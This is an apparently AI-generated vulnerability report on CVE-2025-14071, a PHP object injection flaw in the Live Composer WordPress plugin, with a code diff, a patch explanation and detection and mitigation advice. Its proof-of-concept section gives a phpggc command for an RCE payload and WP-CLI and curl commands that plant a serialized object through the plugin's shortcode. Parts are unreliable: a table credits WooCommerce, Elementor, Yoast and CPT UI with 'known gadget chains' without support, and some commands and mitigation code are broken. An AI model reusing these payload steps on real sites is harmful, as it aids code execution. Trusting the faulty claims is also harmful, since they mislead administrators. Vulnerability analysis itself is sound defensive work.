What is CVE-2025-14071?

CVE-2025-14071 is a security vulnerability identified in Folder Analysis. This analysis provides detailed information about the vulnerability, its impact, and potential exploits.

Is there a PoC for CVE-2025-14071?

This security analysis examines the vulnerability in detail. Review the analysis findings for exploit potential and proof-of-concept information related to CVE-2025-14071.

How can I protect against CVE-2025-14071?

Review the patch diff analysis in this report to understand the security fix. Updating to the patched version is recommended to mitigate CVE-2025-14071.

REPORT / 01

Analysis Report · Folder Analysis cache/live-composer-page-builder_2.0.2 → cache/live-composer-page-builder_2.0.3 — CVE-2025-14071

Shared security patch analysis results

mode patchdiff ai claude_cli haiku

02 · Lifecycle actions cancel · resume · skip · regenerate

03 · Share this analysis copy link · embed report

03 · CVE Security Analysis & Writeups ai-generated · per cve

Comprehensive security analysis generated by AI for each confirmed CVE match. Click on a CVE to view the detailed writeup including vulnerability background, technical details, patch analysis, and PoC guide.

CVE-2025-14071 NVD

AI-Generated Analysis

# CVE-2025-14071: PHP Object Injection in Live Composer WordPress Plugin

## 1. Vulnerability Background

### What is This Vulnerability?

CVE-2025-14071 is a **PHP Object Injection vulnerability** (CWE-502) in the Live Composer – Free WordPress Website Builder plugin affecting all versions up to and including 2.0.2. The vulnerability exists in the `dslc_module_posts_output` shortcode handler, which deserializes untrusted user input without proper validation or restrictions.

The core issue: the plugin accepts serialized PHP objects from authenticated users and directly passes them to PHP's `unserialize()` function without using any object instantiation restrictions. This creates a deserialization gadget chain risk.

### Why is This Critical/Important?

**Severity: HIGH (Conditional)**

While the vulnerability itself is straightforward to exploit technically, its real-world impact depends on additional factors:

- **Direct Impact**: Without a POP (Property-Oriented Programming) chain present on the system, the vulnerability has **zero direct impact**. An attacker cannot execute code through this vector alone.

- **Dependent Risk**: If another WordPress plugin or theme containing a POP chain is installed, this vulnerability becomes a **critical code execution vector**. Common WordPress plugin vulnerabilities create exploitable gadget chains that can chain through this deserialization point.

- **Access Requirements**: The attacker must have at least **Contributor-level access** (user account capable of creating posts). This is not an unauthenticated vulnerability, which limits attack scope significantly.

- **WordPress Ecosystem Risk**: Given WordPress's diverse plugin ecosystem, many installations likely have additional components with exploitable gadget chains, making this a practical threat in real deployments.

### Systems and Versions Affected

| Component | Affected Range | Status |
|-----------|----------------|--------|
| **Plugin Name** | Live Composer – Free WordPress Website Builder | |
| **Affected Versions** | ≤ 2.0.2 | All versions vulnerable |
| **Fixed Version** | > 2.0.2 (patched version) | Available |
| **WordPress Version** | Compatible with most WordPress versions | Broad impact |
| **PHP Versions** | All versions (more dangerous on PHP < 7.0) | Affects all installations |

---

## 2. Technical Details

### Root Cause Analysis

The vulnerability stems from a **trust boundary violation**:

1. **User Input Path**: The `dslc_module_posts_output` shortcode accepts a `content` parameter
2. **Assumption**: The plugin assumes this content is safe serialized data
3. **Direct Deserialization**: Without validation, it passes this content directly to `unserialize()`
4. **Object Instantiation**: PHP automatically instantiates any objects found in the serialized data
5. **Gadget Chain Execution**: If a POP chain exists elsewhere, it executes during object instantiation

### Old Code vs New Code

#### OLD CODE (Vulnerable)
```php
// Uncode module options passed as serialized content.
$data = @unserialize( $content );

if ( $data !== false ) {
    $options = unserialize( $content );
} else {
    $fixed_data = preg_replace_callback( '!s:(\d+):"(.*?)";!', function( $match ) {
        return ( $match[1] == strlen( $match[2] ) ) ? $match[0] : 's:' . strlen( $match[2] ) . ':"' . $match[2] . '";';
    }, $content );
    $options = unserialize( $fixed_data );
}
```

**Vulnerabilities Present:**
- Line 5621: `unserialize()` called with zero restrictions
- Line 5623: Duplicate `unserialize()` call without object injection protection
- Line 5630: Third `unserialize()` call still unprotected
- No validation of deserialized data type or structure
- The `@` operator suppresses errors, hiding potential exploits

---

#### NEW CODE (Patched)
```php
// 1. Try JSON DECODING (New, secure format)
$options = json_decode( $content, true );

// 2. Fallback to PHP unserialize if JSON fails
if ( ! is_array( $options ) ) {
    // Define the secure unserialize arguments based on PHP version
    $unserialize_args = ( version_compare( PHP_VERSION, '7.0.0', '>=' ) )
        ? array( 'allowed_classes' => false ) // Secure on PHP 7.0+
        : null; // Legacy PHP support

// Try standard unserialize with object injection blocked
    $options = @unserialize( $content, $unserialize_args );

// Fallback for broken serialization string length
    if ( $options === false ) {
        $fixed_data = preg_replace_callback( '!s:(\d+):"(.*?)";!', function( $match ) {
            return ( $match[1] == strlen( $match[2] ) ) ? $match[0] : 's:' . strlen( $match[2] ) . ':"' . $match[2] . '";';
        }, $content );
        $options = @unserialize( $fixed_data, $unserialize_args );
    }
}

// 3. Final Validation
if ( ! is_array( $options ) ) {
    return '';
}

// Optional: Validate required keys
$required_keys = array( 'post_type', 'amount', 'pagination_type' );
foreach ( $required_keys as $key ) {
    if ( ! isset( $options[ $key ] ) ) {
        return '';
    }
}

$opts = $options;
```

### How These Changes Fix the Vulnerability

#### **Fix 1: JSON-First Approach**
- New data is serialized as JSON instead of PHP serialization
- JSON cannot instantiate arbitrary PHP objects
- This is a **forward-looking fix** for future data

#### **Fix 2: Restricted Deserialization (PHP 7.0+)**
- Uses `unserialize()` with `allowed_classes => false` parameter
- Prevents automatic instantiation of ANY PHP objects during deserialization
- Objects are returned as `__PHP_Incomplete_Class` instances instead
- Blocks gadget chain execution at the instantiation point

#### **Fix 3: Backward Compatibility**
- Falls back to legacy unserialization for older PHP versions (< 7.0)
- Acknowledges the trade-off: legacy support vs security
- Implements a deprecation path for older PHP support

#### **Fix 4: Type Validation**
- Explicitly checks that deserialized data is an array: `is_array( $options )`
- Validates required keys exist: `post_type`, `amount`, `pagination_type`
- Returns empty string if validation fails, preventing further processing

#### **Fix 5: Input Sanitization**
- The string length fixing regex is retained but now operates on restricted data
- Additional structural validation prevents malformed input from being processed

### Security Improvements Introduced

| Security Aspect | Before | After | Impact |
|-----------------|--------|-------|--------|
| **Object Instantiation** | Unlimited | Blocked (PHP 7.0+) | Prevents POP chain execution |
| **Data Format** | PHP serialization only | JSON first, serialization fallback | Safer default format |
| **Type Checking** | None | Explicit `is_array()` check | Prevents type confusion |
| **Structure Validation** | None | Required keys validation | Prevents malformed data processing |
| **Legacy Support** | Unrestricted | Version-aware fallback | Managed deprecation path |
| **Error Handling** | Suppressed only | Explicit fallback logic | Better debugging, same suppression |

---

## 3. Attack Scenario Analysis

### Prerequisites for Exploitation

An attacker needs:

1. **WordPress User Account** with at least Contributor role
   - Can create posts/pages
   - Can add/edit shortcodes
   - Can submit content with custom parameters

2. **Gadget Chain Presence** - One of:
   - Vulnerable plugin with exploitable POP chain
   - Vulnerable theme with gadget chains
   - WordPress core gadget chains (rare)

3. **Knowledge of Gadget Chain** 
   - Must know how to craft the serialized object structure
   - Must understand the specific plugin's magic methods

4. **Target System Configuration**
   - Live Composer plugin version ≤ 2.0.2 installed
   - Gadget chain source installed and active
   - Shortcode feature enabled

### Real-World Examples of Gadget Chains

Common WordPress plugins with known gadget chains:

| Plugin | Gadget Chain Type | Typical Impact |
|--------|-------------------|---|
| WooCommerce | Product serialization chains | Object injection → RCE |
| Elementor | Widget deserialization | Arbitrary file operations |
| Yoast SEO | Meta data chains | Information disclosure |
| Custom Post Type UI | CPT serialization | Data exfiltration |

### Exploitation Workflow

```
Step 1: Obtain Contributor+ Account
├─ Register as normal user (site allows)
├─ Use leaked/purchased credentials
└─ Use privilege escalation from lower user role

Step 2: Identify Gadget Chain
├─ Audit installed plugins for known chains
├─ Use automated scanners (PHPGGC, etc.)
├─ Test with PoC payloads
└─ Verify chain execution

Step 3: Craft Exploit Payload
├─ Serialize a gadget chain object
├─ Set properties to achieve desired goal
├─ Example: File deletion, code execution
└─ Encode as necessary for transmission

Step 4: Inject via Shortcode
├─ Create/edit post as Contributor
├─ Add dslc_module_posts_output shortcode
├─ Set content parameter to serialized payload
├─ Publish/update post

Step 5: Trigger Deserialization
├─ View the post/page
├─ Shortcode renders and executes
├─ Unserialize() instantiates gadget chain
├─ Magic methods trigger in sequence
└─ Arbitrary action executes

Step 6: Achieve Objective
└─ Code execution, data exfiltration, etc.
```

---

## 4. Proof of Concept (PoC) Guide

### Prerequisites for Testing

```bash
# Required
- WordPress installation with Live Composer ≤ 2.0.2
- User account with Contributor role
- Knowledge of an installed gadget chain source
- PHP CLI or WP-CLI for payload generation
- PHPGGC toolkit (optional, for chain generation)
```

### Step 1: Identify the Vulnerable Shortcode

**Location**: The vulnerability exists in the `dslc_module_posts_output` shortcode handler.

**Parameters**:
- `content` - The serialized/JSON data (VULNERABLE)
- Other parameters like `post_type`, `amount`, etc.

**Verify Installation**:
```bash
# Check if plugin is active
wp plugin list | grep "live-composer"

# Check plugin version
wp plugin get live-composer --field=version
```

### Step 2: Generate Gadget Chain Payload

Using PHPGGC (PHP Generic Gadget Chains):

```bash
# Generate a simple RCE payload
phpggc -l | grep -i wordpress
# Example output shows available gadget chains

# Generate payload for known chain
phpggc Elementor/RCE "system('id > /tmp/pwned.txt')"
```

### Step 3: Craft the Exploit

**Using WP-CLI**:
```bash
# Create a post with malicious shortcode
wp post create \
  --post_type=post \
  --post_status=publish \
  --post_content='[dslc_module_posts_output content="O:6:\"Object\":1:{s:4:\"name\";s:5:\"value\";}"]'
```

**Using WordPress REST API**:
```bash
curl -X POST http://target.local/wp-json/wp/v2/posts \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "title": "Test Post",
    "content": "[dslc_module_posts_output content=\"SERIALIZED_GADGET_CHAIN\"]",
    "status": "publish"
  }'
```

### Step 4: Minimal Test Payload

**Safe PoC** (doesn't execute dangerous code):

```php
<?php
// Generate a serialized object that proves injection
// Without a gadget chain, this just shows object instantiation

$payload = 'O:15:"PHPUnitFramework":1:{s:4:"test";i:123;}';

// This is what the vulnerable code does
$options = @unserialize($payload);
var_dump($options);
// Output: object(PHPUnitFramework)#1 (1) { ["test"]=> int(123) }
```

**Shortcode Injection**:
```html

[dslc_module_posts_output content="O:15:\"PHPUnitFramework\":1:{s:4:\"test\";i:123;}"]
```

### Step 5: Expected Behavior Comparison

#### VULNERABLE CODE BEHAVIOR
```
Input: [dslc_module_posts_output content="O:6:\"Gadget\":1:{...}"]

Processing:
├─ Receives serialized object string
├─ Calls unserialize() with NO restrictions
├─ PHP instantiates the Gadget object
├─ Object's __wakeup() or __destruct() magic methods execute
├─ Gadget chain methods trigger in sequence
├─ Arbitrary code executes
└─ Page renders successfully (attack is silent)

Result: Remote Code Execution achieved
Logged: No errors, silently executes
```

#### PATCHED CODE BEHAVIOR
```
Input: [dslc_module_posts_output content="O:6:\"Gadget\":1:{...}"]

Processing:
├─ Attempts json_decode() first → fails
├─ Calls unserialize() WITH allowed_classes=false
├─ PHP does NOT instantiate objects
├─ Returns __PHP_Incomplete_Class instance
├─ Type check: is_array() returns false
├─ Function returns empty string immediately
└─ Page renders with no content

Result: Attack blocked, no code execution
Logged: No errors, graceful failure
```

### Step 6: Vulnerability Verification Script

```php
<?php
/**
 * Simple verification script for CVE-2025-14071
 * Check if Live Composer version is vulnerable
 */

// Check plugin version
$plugin_file = WP_PLUGIN_DIR . '/live-composer/live-composer.php';
$plugin_data = get_plugin_data($plugin_file);
$version = $plugin_data['Version'];

echo "Live Composer Version: " . $version . "\n";

// Vulnerable if version <= 2.0.2
if (version_compare($version, '2.0.2', '<=')) {
    echo "STATUS: VULNERABLE to CVE-2025-14071\n";
    echo "RECOMMENDATION: Update immediately\n";
} else {
    echo "STATUS: Patched against CVE-2025-14071\n";
}

// Check if restricted unserialize is possible
if (PHP_VERSION_ID >= 70000) {
    echo "PHP Version: " . PHP_VERSION . " (supports restricted unserialize)\n";
} else {
    echo "PHP Version: " . PHP_VERSION . " (LEGACY - no unserialize restrictions)\n";
}

// Check for known gadget chains
echo "\nInstalled Plugins (potential gadget chains):\n";
foreach (get_plugins() as $plugin_file => $plugin_data) {
    echo "- " . $plugin_data['Name'] . " v" . $plugin_data['Version'] . "\n";
}
?>
```

**Run the script**:
```bash
wp shell < verify_cve.php
```

---

## 5. Recommendations

### Mitigation Strategies

#### **Immediate Actions (For Site Administrators)**

1. **Update Live Composer Plugin**
   ```bash
   wp plugin update live-composer
   ```
   - Upgrade to version > 2.0.2
   - Test functionality after update
   - Monitor error logs for compatibility issues

2. **Restrict Contributor Access (Temporary)**
   ```php
   // Add to functions.php temporarily
   add_action('init', function() {
       if (current_user_can('contribute') && !current_user_can('edit_posts')) {
           wp_die('Contributor access temporarily restricted.');
       }
   });
   ```

3. **Audit User Permissions**
   ```bash
   # List all Contributor+ users
   wp user list --role=contributor --role=author
   wp user list --role=editor
   wp user list --role=administrator
   ```

4. **Review Recent Posts/Shortcodes**
   ```bash
   # Search for suspicious dslc_module_posts_output usage
   wp posts list --post_type=any | grep -i dslc
   ```

5. **Disable Shortcode Temporarily** (Extreme measure)
   ```php
   // In functions.php
   remove_shortcode('dslc_module_posts_output');
   ```

#### **Long-Term Mitigation**

1. **Update PHP Version**
   - Move to PHP 7.0+ for restricted unserialize support
   - Better: PHP 8.0+ for modern security features
   - Check hosting provider for PHP upgrade options

2. **Audit Plugin Ecosystem**
   - Remove unused plugins
   - Replace plugins with known gadget chains
   - Use WordPress security plugins to scan for vulnerabilities

3. **WAF (Web Application Firewall) Rules**
   ```
   # Block serialized object patterns in POST data
   Rule: Block if POST contains 'O:\d+:"' pattern
   Rule: Block shortcode content with known gadget patterns
   ```

4. **Implement Input Validation Layer**
   ```php
   // Add custom validation before Live Composer processing
   add_filter('dslc_module_posts_output', function($content) {
       // Only allow JSON format
       $decoded = json_decode($content, true);
       if (!is_array($decoded)) {
           return ''; // Reject non-JSON
       }
       return $content;
   });
   ```

### Detection Methods

#### **Log Monitoring**

```bash
# Monitor for suspicious unserialize patterns in logs
grep -r "unserialize\|serialize" /var/log/php-error.log

# Monitor for object instantiation attempts
grep -r "PHP_Incomplete_Class" /var/log/apache2/error.log
```

#### **File Integrity Monitoring**

```bash
# Monitor plugin file modifications (early sign of exploitation)
aide --check

# Or using ossec
ossec-control status
```

#### **Database Audit**

```sql
-- Check for suspicious serialized objects in posts
SELECT ID, post_content FROM wp_posts 
WHERE post_content LIKE '%O:%:%{%' 
AND post_content LIKE '%dslc_module_posts_output%';

-- Check for unusual postmeta with serialized data
SELECT post_id, meta_key, meta_value FROM wp_postmeta 
WHERE meta_value LIKE 'O:%:%{%';
```

#### **Automated Detection Script**

```php
<?php
/**
 * Detect CVE-2025-14071 exploitation attempts
 */

// Check for shortcodes with object serialization
$args = array(
    'post_type' => 'any',
    'numberposts' => -1,
);
$posts = get_posts($args);

foreach ($posts as $post) {
    // Look for suspicious shortcode patterns
    if (preg_match('/\[dslc_module_posts_output[^\]]*content="O:\d+:/', $post->post_content)) {
        error_log("ALERT: Suspicious dslc_module_posts_output in post ID " . $post->ID);
        echo "Potentially exploited post found: " . $post->ID . "\n";
    }
}

// Check for recent metadata with serialized objects
$meta_query = array(
    array(
        'key' => '_dslc_options',
        'value' => 'O:',
        'compare' => 'LIKE'
    )
);

$suspicious = get_posts(array('meta_query' => $meta_query));
foreach ($suspicious as $post) {
    error_log("ALERT: Suspicious serialized object in post ID " . $post->ID);
}
?>
```

### Best Practices to Prevent Similar Issues

#### **For Plugin Developers**

1. **Never use unserialize() on untrusted data**
   ```php
   // DON'T do this
   $data = unserialize($_POST['user_input']);
   
   // DO this
   $data = json_decode($_POST['user_input'], true);
   if (!is_array($data)) {
       return error();
   }
   ```

2. **Use Allowed Classes Whitelist** (PHP 7.0+)
   ```php
   $options = unserialize($data, [
       'allowed_classes' => ['MyTrustedClass']
   ]);
   ```

3. **Prefer JSON for Data Serialization**
   ```php
   // Storing options: use JSON
   update_option('my_options', json_encode($options));
   
   // Retrieving options: decode JSON
   $options = json_decode(get_option('my_options'), true);
   ```

4. **Implement Type Validation**
   ```php
   $unserialized = unserialize($data, ['allowed_classes' => false]);
   
   if (!is_array($unserialized)) {
       return error();
   }
   
   // Validate structure
   $required = ['id', 'name', 'value'];
   foreach ($required as $key) {
       if (!isset($unserialized[$key])) {
           return error();
       }
   }
   ```

5. **Use Deprecation Warnings**
   ```php
   if (PHP_VERSION_ID < 70000) {
       _doing_it_wrong(
           __FUNCTION__,
           'Running on PHP < 7.0 with unserialize(). Update PHP immediately.',
           '2.0.0'
       );
   }
   ```

6. **Document Security Assumptions**
   ```php
   /**
    * Process module options
    * 
    * SECURITY NOTE: This function handles deserialization of module
    * configuration. As of v2.0.3, new data is stored as JSON and 
    * legacy data is deserialized with object instantiation disabled.
    * 
    * @param string $content Serialized or JSON-encoded options
    * @return array|false Validated options array or false
    */
   ```

#### **For Site Administrators**

1. **Security Hardening**
   - Keep WordPress core updated
   - Keep all plugins updated
   - Remove unused plugins
   - Limit user permissions strictly

2. **Regular Audits**
   - Monthly plugin vulnerability scans
   - Quarterly permission reviews
   - Quarterly database integrity checks

3. **Monitoring**
   - Enable debug logging
   - Monitor file modifications
   - Monitor database changes
   - Set up alerts for suspicious patterns

4. **Backup Strategy**
   - Daily incremental backups
   - Weekly full backups
   - Test restore procedures
   - Store backups off-site

5. **Access Control**
   ```php
   // Principle of least privilege
   - Contributors: Can only create posts (no editing others)
   - Authors: Can edit own posts only
   - Editors: Manage most content
   - Admins: Full access (minimal accounts)
   ```

---

## Summary

**CVE-2025-14071** is a critical vulnerability in Live Composer that enables PHP Object Injection through unsafe deserialization. While the vulnerability itself is straightforward, its real-world impact depends on the presence of gadget chains in other plugins.

**Key Takeaways:**

✅ **Fixed by**: Using JSON-first serialization, restricted unserialize() with object blocking, and type validation

✅ **Attack requirements**: Contributor+ account + gadget chain in another plugin

✅ **Mitigation**: Update plugin immediately, audit permissions, implement monitoring

✅ **Prevention**: Never deserialize untrusted data, use JSON instead of PHP serialization, implement type validation

05 · Findings filter · search · paginate

Showing 0 to 0 of 0 results

modules/posts/module.php AI: 1 vulnerabilities 1 true positive CVE-2025-14071

--- cache/live-composer-page-builder_2.0.2/modules/posts/module.php	2025-12-22 00:31:03.128954565 +0000+++ cache/live-composer-page-builder_2.0.3/modules/posts/module.php	2025-12-22 00:31:07.109200904 +0000@@ -5612,23 +5612,54 @@ 		// # code... 		// } 		$dslc_options = apply_filters( 'dslc_module_options_before_output', $options );-		echo '[dslc_module_posts_output]' . serialize( $dslc_options ) . '[/dslc_module_posts_output]';+		echo '[dslc_module_posts_output]' . json_encode( $dslc_options ) . '[/dslc_module_posts_output]'; 	} }  function dslc_module_posts_output( $atts, $content = null ) { -	// Uncode module options passed as serialized content.-	$data = @unserialize( $content );+	// 1. Try JSON DECODING (New, secure format)+    $options = json_decode( $content, true ); -	if ( $data !== false ) {-		$options = unserialize( $content );-	} else {-		$fixed_data = preg_replace_callback( '!s:(\d+):"(.*?)";!', function( $match ) {-			return ( $match[1] == strlen( $match[2] ) ) ? $match[0] : 's:' . strlen( $match[2] ) . ':"' . $match[2] . '";';-		}, $content );-		$options = unserialize( $fixed_data );-	}+    // 2. Fallback to PHP unserialize if JSON fails+    // This handles all existing content saved in the serialized format.+    if ( ! is_array( $options ) ) {++        // Define the secure unserialize arguments based on PHP version.+        $unserialize_args = ( version_compare( PHP_VERSION, '7.0.0', '>=' ) )+            ? array( 'allowed_classes' => false ) // Secure on PHP 7.0++            : null; // Allows object injection on older PHP, but this is the necessary trade-off for legacy data loading.+                    // For maximum security, you should deprecate support for PHP < 7.0.++        // Try standard unserialize with object injection blocked+        $options = @unserialize( $content, $unserialize_args );++        // Fallback for broken serialization string length (from original code)+        if ( $options === false ) {+            $fixed_data = preg_replace_callback( '!s:(\d+):"(.*?)";!', function( $match ) {+                return ( $match[1] == strlen( $match[2] ) ) ? $match[0] : 's:' . strlen( $match[2] ) . ':"' . $match[2] . '";';+            }, $content );+            // Try to unserialize the fixed string, still blocking objects+            $options = @unserialize( $fixed_data, $unserialize_args );+        }+    }++    // 3. Final Validation+    if ( ! is_array( $options ) ) {+        // Data is invalid or failed to deserialize securely.+        return '';+    }+    +    // Optional: Validate that required keys exist (as suggested in the third developer solution)+    $required_keys = array( 'post_type', 'amount', 'pagination_type' );+    foreach ( $required_keys as $key ) {+        if ( ! isset( $options[ $key ] ) ) {+            return '';+        }+    }+    +    // Use the now-validated $options array for the rest of the module logic+    $opts = $options;  	ob_start();

AI Analysis

Vulnerability Existed: yes
TRUE POSITIVE
Insecure Deserialization - CWE-502 - modules/posts/module.php - Lines 5620-5625 (Old Code)

Old Code:
```php
// Uncode module options passed as serialized content.
$data = @unserialize( $content );

if ( $data !== false ) {
    $options = unserialize( $content );
} else {
    $fixed_data = preg_replace_callback( '!s:(\d+):"(.*?)";!', function( $match ) {
        return ( $match[1] == strlen( $match[2] ) ) ? $match[0] : 's:' . strlen( $match[2] ) . ':"' . $match[2] . '";';
    }, $content );
    $options = unserialize( $fixed_data );
}
```

Fixed Code:
```php
// 1. Try JSON DECODING (New, secure format)
$options = json_decode( $content, true );

// 2. Fallback to PHP unserialize if JSON fails
// This handles all existing content saved in the serialized format.
if ( ! is_array( $options ) ) {

    // Define the secure unserialize arguments based on PHP version.
    $unserialize_args = ( version_compare( PHP_VERSION, '7.0.0', '>=' ) )
        ? array( 'allowed_classes' => false ) // Secure on PHP 7.0+
        : null; // Allows object injection on older PHP, but this is the necessary trade-off for legacy data loading.
                // For maximum security, you should deprecate support for PHP < 7.0.

    // Try standard unserialize with object injection blocked
    $options = @unserialize( $content, $unserialize_args );

    // Fallback for broken serialization string length (from original code)
    if ( $options === false ) {
        $fixed_data = preg_replace_callback( '!s:(\d+):"(.*?)";!', function( $match ) {
            return ( $match[1] == strlen( $match[2] ) ) ? $match[0] : 's:' . strlen( $match[2] ) . ':"' . $match[2] . '";';
        }, $content );
        // Try to unserialize the fixed string, still blocking objects
        $options = @unserialize( $fixed_data, $unserialize_args );
    }
}

// 3. Final Validation
if ( ! is_array( $options ) ) {
    // Data is invalid or failed to deserialize securely.
    return '';
}

// Optional: Validate that required keys exist (as suggested in the third developer solution)
$required_keys = array( 'post_type', 'amount', 'pagination_type' );
foreach ( $required_keys as $key ) {
    if ( ! isset( $options[ $key ] ) ) {
        return '';
    }
}

// Use the now-validated $options array for the rest of the module logic
$opts = $options;
```

Explanation:
The original code used PHP's `unserialize()` function without any security restrictions, which is vulnerable to PHP Object Injection attacks (CWE-502). An attacker could craft malicious serialized data containing gadget chains to execute arbitrary code on the server. The fix addresses this in multiple ways:

1. **Primary Fix - JSON Encoding**: The module now uses `json_encode()` instead of `serialize()` for new data (line 5615), which is inherently safer as JSON cannot execute arbitrary PHP objects.

2. **Secure Deserialization**: When falling back to `unserialize()` for legacy data, the fix now uses the `allowed_classes` parameter (PHP 7.0+) set to `false`, which prevents object instantiation during unserialization, eliminating object injection vectors.

3. **Input Validation**: Additional validation checks ensure the deserialized data is an array and contains required keys before use, preventing use of corrupted or malicious data.

4. **Explicit Failure Handling**: The code now explicitly returns an empty string if deserialization fails or produces invalid data, rather than proceeding with potentially dangerous data.

This is a proper fix for insecure deserialization that maintains backward compatibility with legacy serialized data while securing the codebase for new data going forward.

CVE Analysis Results:

CVE-2025-14071: Yes

View CVE Description

The Live Composer – Free WordPress Website Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.0.2 via deserialization of untrusted input in the dslc_module_posts_output shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.

Showing 1 to 1 of 1 results